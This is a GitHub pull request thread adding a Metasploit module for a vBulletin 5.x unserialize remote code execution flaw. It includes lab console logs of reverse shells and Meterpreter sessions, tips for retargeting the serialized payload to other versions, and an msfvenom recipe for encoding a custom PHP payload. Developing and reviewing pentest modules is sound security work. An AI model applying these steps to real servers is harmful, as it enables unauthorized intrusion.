Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Implement a module for the recent vBulletin RCE #6196

Merged
merged 6 commits into from Nov 12, 2015

Conversation

Projects
None yet
5 participants
@jvoisin
Copy link
Contributor

jvoisin commented Nov 6, 2015

This module implements the recent unserialize-powered RCE against vBulletin 5.1.X

Step to reproduce:

  1. Install vBulletin 5.1.X (It's not a free software, you have to buy it)
  2. Launch the exploit against it
msf exploit(vbulletin_unserialize) > check
[*] 192.168.1.25:80 - The target appears to be vulnerable.
msf exploit(vbulletin_unserialize) >
msf exploit(vbulletin) > run

[*] Started reverse handler on 192.168.1.11:4444
[*] Sending stage (33068 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100

meterpreter > getuid
Server username: www-data (33)
Implement a module for the recent vBulletin RCE
This module implements the recent unserialize-powered RCE against
vBulletin 5.1.X

Step to reproduce:

1. Install vBulletin 5.1.X
2. Launch the exploit against it

```
msf exploit(vbulletin_unserialize) > check
[*] 192.168.1.25:80 - The target appears to be vulnerable.
msf exploit(vbulletin_unserialize) >
```

```
msf exploit(vbulletin) > run

[*] Started reverse handler on 192.168.1.11:4444
[*] Sending stage (33068 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100

meterpreter > getuid
Server username: www-data (33)
```
@nixawk

This comment has been minimized.

Copy link
Contributor

nixawk commented Nov 6, 2015

Please TARGETURI option here and let's set vBulltin url.

@madmike33

This comment has been minimized.

Copy link

madmike33 commented Nov 6, 2015

@jvoisin when running it iam getting
[] Started reverse handler on (my:ip) 4444
[] Exploit completed, but no session was created.

@jvoisin

This comment has been minimized.

Copy link
Contributor Author

jvoisin commented Nov 6, 2015

Super-sorry, I had an encoder enabled!
I added double-quotes as a badchar, it should work now

end

def check
res = send_request_cgi({ 'uri' => '/' })

This comment has been minimized.

Copy link
@wchen-r7

wchen-r7 Nov 6, 2015

Contributor

You should probably make use of the URI from TARGETURI like you did in def exploit


def check
res = send_request_cgi({ 'uri' => '/' })
if (res && res.body =~ /Version 5.1./ && res.body =~ /Copyright © 2015 vBulletin Solutions, Inc./)

This comment has been minimized.

Copy link
@wchen-r7

wchen-r7 Nov 6, 2015

Contributor

Remember to escape the dots :-)

Or if you want, you can do: res.body.include?(), which doesn't use a regex.

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Nov 6, 2015

👍

@madmike33

This comment has been minimized.

Copy link

madmike33 commented Nov 6, 2015

GREAT JOB MATES !!! :)

@wchen-r7 wchen-r7 self-assigned this Nov 6, 2015

@madmike33

This comment has been minimized.

Copy link

madmike33 commented Nov 6, 2015

However when trying to implement a custom payload i get this .
Exploit failed: No encoders encoded the buffer successfully.

@jvoisin

This comment has been minimized.

Copy link
Contributor Author

jvoisin commented Nov 6, 2015

Shall I enforce the use of the php/base64 encoder then?

@madmike33

This comment has been minimized.

Copy link

madmike33 commented Nov 6, 2015

Yes i think you should, the payload need to be encoded :) (which in most cases the custom payloads are in php)

@jvoisin

This comment has been minimized.

Copy link
Contributor Author

jvoisin commented Nov 6, 2015

Specifying the badchars isn't enough?

@madmike33

This comment has been minimized.

Copy link

madmike33 commented Nov 6, 2015

Depends but lets say if your aim is to upload the PHP payload i think it isnt enough 👍 because you might never know what payload is gonna be used.But Please do add it i would like to test it.

@madmike33

This comment has been minimized.

Copy link

madmike33 commented Nov 6, 2015

Or maybe the best option is to make it uploade a php reverse shell, in this case you need base64/ but atleast will save lots of time.

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Nov 6, 2015

@madmantm For the encoder failure you hit, you were doing this? set payload generic/custom ? If yes, by default the payload ARCH and PLATFORM are empty.... and if I remember correctly, the encoder is determined by these two from the payload (not the exploit). So you need to set them as well. Please give that a try.

@Hood3dRob1n

This comment has been minimized.

Copy link

Hood3dRob1n commented Nov 7, 2015

if you change vB_Database_MySQLi to vB_Database and adjust the string length from 18 to 11 in the serialized string, it also works against 5.0.0 - 5.0.5 as well ;)

@nixawk

This comment has been minimized.

Copy link
Contributor

nixawk commented Nov 7, 2015

@jvoisin Cool ! It exploits Windows 7 Home Premium Edition + vBulltin 5.1.7 successfully. vBulletin 5.1.2 is one of targets.

msf exploit(vbulletin_unserialize) > check 
[*] 192.168.1.101:80 - Cannot reliably check exploitability.
msf exploit(vbulletin_unserialize) > run 

[*] Started reverse handler on 192.168.1.108:4444 
[*] Sending stage (33068 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.108:4444 -> 192.168.1.101:1037) at 2015-11-07 02:57:33 +0000

meterpreter > sysinfo 
Computer    : SECLAB
OS          : Windows NT SECLAB 6.1 build 7601 (Windows 7 Home Premium Edition Service Pack 1) i586
Meterpreter : php/php
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.101 - Meterpreter session 1 closed.  Reason: User exit

@Hood3dRob1n

  • vB_Database is only valid for vBulltin 5.0.X,
  • vB_Database_MySQLi can exploit vBulltin 5.1.x.

Is that a way to exploit both of 5.0.x and 5.1.x ?

@madmike33

This comment has been minimized.

Copy link

madmike33 commented Nov 7, 2015

Good point @Hood3dRob1n

@madmike33

This comment has been minimized.

Copy link

madmike33 commented Nov 7, 2015

But i think the module need to modified so it uploads a payload directly, i mean i have tested it on local host it works great but i hosted on one of my offshore servers, it shows nothing all i get is this
[*] Started reverse handler on 192.168.1.108:4444

@madmike33

This comment has been minimized.

Copy link

madmike33 commented Nov 7, 2015

@wchen-r7 i think you ment me ? well i tried for some reason nothing changed same.. any other suggestions ?

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Nov 7, 2015

@madmike33 Yeah sorry, I meant you.

I looked into the problem a little bit deeper. It turns out the exploit isn't at fault causing the user unable to use a custom payload, in fact it's actually the payloads/single/generic/custom.rb always forcing the 'none' encoder. Basically this means this is a wide-spread issue in Metasploit Framework. When you use the generic/custom payload, encoding is just not supported regardless what exploit you're using.

This is the bug:
https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/generic/custom.rb#L57

Basically in that loops, it means "I only accept the generic/none encoder".

The good news is.......... I don't think this issue should be a blocker for this exploit. But we definitely need to file it.

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Nov 7, 2015

@madmike33 Also, I think the workaround for you is:

  1. Save your custom PHP payload as a file (let's call it "/tmp/test.php" here)
  2. Use msfvenom to encode it manually: cat /tmp/test.php | ./msfvenom -e php/base64 --arch=php --platform=php -o /tmp/encoded_php_payload.php
  3. Load the exploit
  4. set payload generic/custom
  5. set PAYLOADFILE /tmp/encoded_php_payload.php
  6. Configure the rest of the mandatory database options
  7. run. The exploit should fire without the encoding problem.
@madmike33

This comment has been minimized.

Copy link

madmike33 commented Nov 7, 2015

@wchen-r7 well i didnt know this is a bug untill recently because honestly i have been using custom payload on all the msf modules i just had problems with some of them,but not all on general,however i will try what you suggested and provide a feedback however what is the reason you think about my other issue when i run the module against some remote website i have made for test all i get is
[*] Started reverse handler on 192.168.1.108:4444
And thats it not shell no nothing i didnt have time to wireshark it but... I dnt think its a problem from my side.

@jvoisin

This comment has been minimized.

Copy link
Contributor Author

jvoisin commented Nov 7, 2015

The exploit now supports 5.0.x and 5.1.x
Thank you for the feedback/idea Hood3dRob1n :)

The modules now works on 5.1.X and 5.0.X
- Added automatic targeting
- Added support for 5.0.X
@madmike33

This comment has been minimized.

Copy link

madmike33 commented Nov 7, 2015

@jvoisin any idea about my issue :/

@jvoisin

This comment has been minimized.

Copy link
Contributor Author

jvoisin commented Nov 7, 2015

@wchen-r7 already explained the issue, and even gave you a workaround.

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Nov 7, 2015

@madmike33 You were testing against a remote website? Do you legally own the server and remote network? It looks like you are listening on 192.168.1.08, which means you are also telling the reverse shell to connect to 192.168.1.108. Unless you're both sitting on the same internal network, that network/config setup won't work.

This would be difficult for me to help you any further, because I'm not able to verify the legitimacy of your pentest (no offense). Sorry.

@madmike33

This comment has been minimized.

Copy link

madmike33 commented Nov 7, 2015

Sure man i do own this server and i have ran a vbulletin installation just to test this module however i do understand. Dnt worry i will figure it out myself :)

@madmike33

This comment has been minimized.

Copy link

madmike33 commented Nov 9, 2015

Thank You @wchen-r7 problem solved after i did what u said :) and Thank You @jvoisin for the module. !!!

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Nov 9, 2015

👍

I will try to land the module as soon as possible.

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Nov 10, 2015

Does anybody have a vBulletin 5.0.0 beta 13? This is what I have.... and the exploit doesn't work against it.

@madmike33

This comment has been minimized.

Copy link

madmike33 commented Nov 11, 2015

Yes for me 5.0.0 beta 13 also doesnt work.

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Nov 11, 2015

@jvoisin Could you please send me a pcap of the exploit successfully getting a shell? Please send to wei_chen[at]rapid7.com. Thanks!

@jvoisin

This comment has been minimized.

Copy link
Contributor Author

jvoisin commented Nov 12, 2015

@wchen-r7 done.
Please squash my commit before merging it :)

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Nov 12, 2015

Got the pcap, thank you!

@wchen-r7 wchen-r7 merged commit e2678af into rapid7:master Nov 12, 2015

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

wchen-r7 added a commit that referenced this pull request Nov 12, 2015

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Nov 12, 2015

Merged. Thanks everyone for testing!

BTW, since @all3g says it works on Windows too (and it looks like it does), I moved the module to https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/vbulletin_unserialize.rb.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.